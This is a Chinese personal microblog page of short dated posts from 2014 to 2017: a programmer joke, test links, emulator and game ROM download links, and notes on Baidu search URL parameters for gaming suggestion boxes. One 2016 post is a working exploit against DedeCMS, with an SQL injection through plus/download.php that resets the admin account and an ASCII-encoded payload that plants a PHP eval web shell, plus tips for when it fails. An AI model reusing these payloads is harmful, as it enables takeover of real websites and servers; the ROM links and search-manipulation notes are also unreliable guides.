微博搜索

关键词:微博 评论 昵称

老化测试电源

2017/12/1 17:21:08 通过网页

如何判断程序员在做什么
1.打字快且停顿:正编码;
2.键盘鼠标并用且不停点击,在debug;
3.不停滚轮或pagedown:在查错;
4.不停按刷新/f5:脚本卡住了;
5. 一动不动紧盯屏幕:程序抛出异常;
6.表情时而严肃时而轻松:产品上线测试中;
7.手放键盘上长时间未动:加班太多猝死了

2017/9/29 16:27:04 通过网页

试用了一把七牛云存储 测试域名
图片
demotest2
图片空间
图片空间2

2017/2/28 14:38:25 通过网页

安卓手机唤起QQ临时会话链接代码:mqqwpa://im/chat?chat_type=wpa&uin=2880260726&version=1&src_type=web&web_src=oicqzone.com
经测试 兼容苹果手机。

2017/1/10 15:21:41 通过网页

用诺基亚5320XM发贴测试

2016/12/21 7:46:26 通过手机

网站测试:链接

以下内容需要输入正确密码才可以查看!

2016/6/27 0:13:07 通过网页

电脑玩下载这个模拟器(已经设置好映射,到手直接玩)
VirtuaNESex(20140131).rar
http://pan.baidu.com/share/link?shareid=4077897198&uk=2097192871

测试文件
超级魂斗罗 [樱组汉化].nes
http://yun.baidu.com/s/14hiii

游戏rom(4000个游戏包+708个中文游戏包)
http://pan.baidu.com/share/link?shareid=2012323556&uk=2097192871

2016/6/18 16:49:38 通过网页

plus/download.php
构造SQL语句 (提交的时候用ascii加密,程序会帮我们自动解密的,所以无视gpc):
admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #
完整SQL语句:
UPDATE `dede_admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #_downloads` SET downloads = downloads + 1 WHERE hash='$hash'
EXP:
http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35
如果不出问题,后台登录用户spider密码admin
漏洞真的不止一处,各种包含,远程代码执行,很多,列位慢慢研究。
如果找不到后台,参见以前修改数据库直接拿SHELL的方法:
UPDATE `dede_mytag` SET `normbody` = '{dede:php}file_put_contents(''spider.php'','''');{/dede:php}' WHERE `aid` =1 LIMIT 1 ;
EXP:
http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=120&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=109&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35
会在plus目录生成 x.php 密码 m
http://127.0.0.1/plus/x.php
update成功后还要访问下 /plus/mytag_js.php/aid=1
失败原因:
测试发现,如果aid为空或已经生成过一次,则会写shell失败….更改倒数第三个ascii改变改变aid(即&arrs2[]=49)
配图:
1.查看dede当前版本,补丁情况:
http://www.nxadmin.com/data/admin/ver.txt

2016/6/15 18:27:30 通过网页

百度的url;
1: http://www.baidu.com/index.php?tn=maxthon2&ch=3
?ch= 浏览器的代号
2:http://www.baidu.com/index.php?tn=sogouie_dg
?tn= 抵达方式
3:http://www.baidu.com/s?wd=%BA%A3 … p=0&inputT=6216
二:s?wd= 指关键词
三:rsv_bp= (0,1,2) 0首页输入;1顶部搜索输入;2底部搜索输入
四:rsv_spt=(1,3) 浏览器内核;
五:sug= 修改下拉框文字时才会出现,指的是下拉框出现的关键词。
六:oq= 指的是你在输入搜索词时,输入一半,选择了下拉框之前输入的词;
七:inputT= 打字过程耗时(只有在顶部搜索,首页搜索才会出现)。
4:http://www.baidu.com/s?bs=%BA%A3 … =%EB%F8%BA%A3%D1%F3
s?bs= 指的是上一次搜索的词
5:http://www.baidu.com/s?wd=%EB%F8%BA%A3%D1%F3&pn=10
pn= 指的是(页码-1)*10
6:http://www.baidu.com/s?wd=%D6%D8 … f=1&rsv_ers=xn1
一: rsp= 指的是相关搜索排序(从0开始)
二:oq= 指的是搜索词,只有当url地址出现rsp而非rsv_bp时,oq才指的是从搜索词跳转到相关搜索。
三:f= (1,3,8)也许还有其他的,暂时发现就这3种,1指的是相关搜索;3下拉框搜索;8用户自主搜索。
四:rsv_ers=xn* (*取0或1) 指的是搜索词后,翻页出现对应的相关搜索,从0开始。如果在url里已经是0的话,那对应的相关搜索就从1开始(这个参数还有很多密,这个只是初步测试);
关于刷下拉框,相关搜索所需要注意的重要一些参数;
s?bs=;wd=;inputT=;f=;

2016/5/19 13:31:32 通过网页


以下内容需要输入正确密码才可以查看!

2016/3/11 17:39:15 通过网页

发现一款asp的免费商城软件不错 shop7z 演示测试地址

2014/12/5 19:09:02 通过网页

dot Net 4.0 web测试 url

2014/12/4 16:16:05 通过网页

查找了很多方法 最终找到了一个办法 用FlashPaper软件 将word一个一个转成swf。。然后再上传swf。。效果如: 测试地址

2014/12/2 16:16:03 通过网页

共计:13 条记录 每页:20条1